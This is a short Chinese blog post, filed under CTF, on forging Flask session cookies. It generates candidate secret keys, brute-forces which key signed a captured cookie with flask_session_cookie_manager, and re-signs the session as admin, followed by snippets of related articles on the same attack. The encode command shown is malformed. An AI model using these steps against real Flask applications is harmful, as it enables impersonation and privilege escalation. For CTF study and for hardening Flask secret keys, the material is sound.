flask session伪造

已于 2023-12-07 20:52:09 修改
阅读量322 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: flask python 后端
于 2023-11-10 11:07:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/shao65308/article/details/134327968
文章介绍了使用Python生成一组随机的base64编码的secre_key,以及如何通过sed和xargs进行字符串操作,如修改Cookie值,以进行爆破攻击或管理Flask会话cookie。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

import base64,random

with open(r'E:\ser.txt','w') as f:
    for i in range(1,101):
        secret_key = 'wanbao'+base64.b64encode(str(i).encode('utf-8')).decode('utf-8')+'wanbao'
        f.write(secret_key+'\n')

生成所有可能的secre_key文件

爆破是用了哪个secre_key

cat wr.txt |sed 's/\r//;s/\n//'|xargs -i python3 flask_session_cookie_manager3.py  decode -c 'eyJpc19hZG1pbiI6ZmFsc2UsIm5hbWUiOiJzc3MiLCJ1c2VyX2lkIjoyfQ.ZU2SdQ.bQziiEI4D-b67LrbHpHnXUel8l4' -s {}

#或者

sed 's/\r//;s/\n//' wr.txt|xargs -i python3 flask_session_cookie_manager3.py  decode -c 'eyJpc19hZG1pbiI6ZmFsc2UsIm5hbWUiOiJzc3MiLCJ1c2VyX2lkIjoyfQ.ZU2SdQ.bQziiEI4D-b67LrbHpHnXUel8l4' -s {}

{'is_admin': False, 'name': 'sss', 'user_id': 2}
修改为:{'is_admin': True, 'name': 'admin', 'user_id': 1}

python3 flask_session_cookie_manager3.py  encode -s  'eyJpc19hZG1pbiI6ZmFsc2UsIm5hbWUiOiJzc3MiLCJ1c2VyX2lkIjoyfQ.ZU2SdQ.bQziiEI4D-b67LrbHpHnXUel8l4' -s {}

把生成的字符串替换Cookie值

Flasksession伪造(从某平台学习Session身份伪造)
Y4tacker的博客
08-02 1万+
文章目录工具介绍FLASK解密FLASK加密脚本 工具介绍 FLASK解密 不推荐网上那个,反而这个倒是挺好用 #!/usr/bin/env python3 import sys import zlib from base64 import b64decode from flask.sessions import session_json_serializer from itsdangerous import base64_decode def decryption(payload): payl
HCTFadmin--关于flasksession伪造和unicode的欺骗
unexpectedthing的博客
11-07 1034
文章目录CTF题目非预期解预期解解法1---flask session伪造解法2----Unicode欺骗解法3---条件竞争 CTF题目 地址:HCTF-admin 非预期解 可以直接登录,利用弱口令 login页面,账号:admin,密码:123,就直接得到flag 预期解 首先进去看到几个界面,login,register,和登录成功后(自己注册然后登录)的四个界面。 然后在index页面源码发现提示,you are not admin,估计题目是让我们登录成admin,然后出flag,于是想到cha
技术分享 跨越语言的艺术:Flask Session 伪造
m0_46699477的博客
10-18 423
在白帽汇安全研究院,漏洞检测和利用是一项创造性的工作,我们致力于以最简洁,高效的方式来实现。为了在 Goby 中实现 Flask Session 生成和利用方法,我们花费大量精力去调试 Flask 源码,分析 Session 的构造过程。最终,我们成功在 Go 语言中实现了 Flask Session 校验和生成方法。
Flask Session 伪造全流程解析:从内存窃取到会话劫持
最新发布
井底之蛙见世界
05-25 1015
摘要:本文探讨了Flask框架中Session伪造的安全风险及攻击流程。Flask默认将Session数据存储在客户端Cookie中,若攻击者获取应用的SECRET_KEY(可通过内存窃取),便可伪造合法Session。文章详细解析了从内存提取SECRET_KEY的步骤,包括定位进程、转储内存、搜索密钥等,并演示了如何构造伪造Session数据及签名。此外,还介绍了使用flask-session-cookie-manager工具简化伪造过程的方法,以及相应的安全防范措施。该攻击可能导致身份劫持、数据篡改等
Flask中的session伪造
m0_60716947的博客
10-18 1363
flasksession伪造
Flasksession伪造
TenG的博客
05-22 4794
前言 本文结合CTF中遇到的题目来说一下session伪造,虽然已经有很多师傅写了,而且写的都特别好,但是还是想自己记录一下,也方便以后复习。ciscn中就有一个session伪造的题,由于之前没有做过就没做出来,还是有点遗憾的。但比较戏剧性的是,上午比赛刚结束,下午刷BUU的时候就遇到了同样的题目。嗐,还是自己太菜,下面就结合BUUCTF中的[HCTF 2018]admin来说一下,文中比较拙劣的地方还请师傅们指正一下。参考文章 正文 本来这个题是有三种解法的,分别是:flask session伪造、Un
CakePHP框架Session设置方法分析
10-20
使用这些方法时,开发者需要注意确保代码的安全性,防止Session劫持、伪造等安全问题。例如,合理使用`valid`方法验证会话有效性,避免使用不安全的序列化格式存储敏感数据等。 此外,CakePHP框架中Session的处理也...
CSRF(跨站点请求伪造)在Flash中的利用
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
07-28 376
0×00 前言 CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻...
Laravel开发-session
08-28
使用`\Session::flash('key', 'value')`存储闪存数据,这些数据将在下一次请求后自动清除。 5. **会话中间件**: Laravel的会话中间件负责处理会话开始、结束以及数据的读写。在每个请求开始时,中间件会自动启动...
SpringMVC中Model与Session的操作详解
5. 在操作Session时要注意安全性问题,比如防止Session劫持和跨站请求伪造(CSRF)。 6. 在分布式系统中,Session共享问题较为复杂,需要借助Session复制、Session持久化到数据库或分布式缓存(如Redis)等策略解决...
flask-session-cookie-manager-master.zip
08-14
众所周知,flasksession是存储在客户端cookie中的,而且flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,简单的来说就是flasksession具有防伪造性,但是没有加密性,所以我们可以将flasksession进行解码和编码。
flask-session-cookie-managerFlask会话Cookie解码器
02-05
Flask Session Cookie解码器/编码器 原作者: 修复和改进作者: 从导入 依赖 Python 2或Python 3 安装 包 BlackArch Linux # pacman -S flask-session-cookie-manager{3,2} 吉特 ArchLinux 两者python3 etn python2: $ git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager # makepkg -sic 其他
session,PIN码伪造学习(py flask)
竹盐笙熙的博客
03-12 2964
学习一下伪造session,PIN码的知识
flask中的session伪造问题
m0_62422842的博客
09-05 3181
flask中的session伪造问题,涉及两道ctf题目,一道主要考察session伪造,另一道session伪造与py反序列化结合考察。
[HCTF 2018]admin(flask session伪造,Unicode欺骗)
qq_44657899的博客
03-01 2805
先随便注册一个账号进去看看。 在index的源码处找到提示,you are not admin,估计是要用admin的身份登录才会有flag。 然后在change的源码找到了网站项目的github地址: 下载下来是一个flask项目,这里看了看wp知道要看路由route.py,然而我这种菜鸡是看不懂的。 有三种解题方法,不过看其他wp第三种都没有实现。 一,flask session伪造: 这...
web:catcat-new(文件包含漏洞、flask_session伪造
sleepywin的博客
11-30 1350
proc/self/mem是当前进程的内存内容,通过修改该文件相当于直接修改当前进程的内存数据。通过/proc/PID可以访问对应PID的进程内核数据,而/proc/self访问的是当前进程的内核数据。flask_session伪造需要用到secret_key,而secret_key的值可以通过内存数据获取。先读取/proc/self/maps文件获取可读内容的内存映射地址。/proc/self/maps包含的内容是当前进程的内存映射关系,可通过读取该文件来得到内存数据映射的地址。
浅谈flask中的session伪造
lukky_的博客
11-19 428
python3 脚本3.py decode -c "session值" -s "key值"python3 脚本3.py encode -s "key值" -t "我们需要伪造的值"flask中的session是存储在客户端的cookie中,flask仅对数据进行签名。flask通过一个secret_key 密钥对数据 进行签名来防止session被篡改。前提 得到session信息 并且 知道flask的签名的SECRET_KEY。知识点 flasksession伪造
HCTF 2018admin ——flask session伪造unicode伪造
4pri1
02-10 386
[HCTF 2018]admin ——flask session伪造||unicode伪造 猜测要么从url栏,要么从注册登录部分注入 猜admin的密码 123,对了本题结束。 如果按照完整解这个题 查看源代码,发现新提示 其余没有提示,先注册账号并登录 更新了新的change password 和post页面 在change password发现新提示 注册从bp抓包入手 admin不能注册 但是发现报文里有session所以不
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值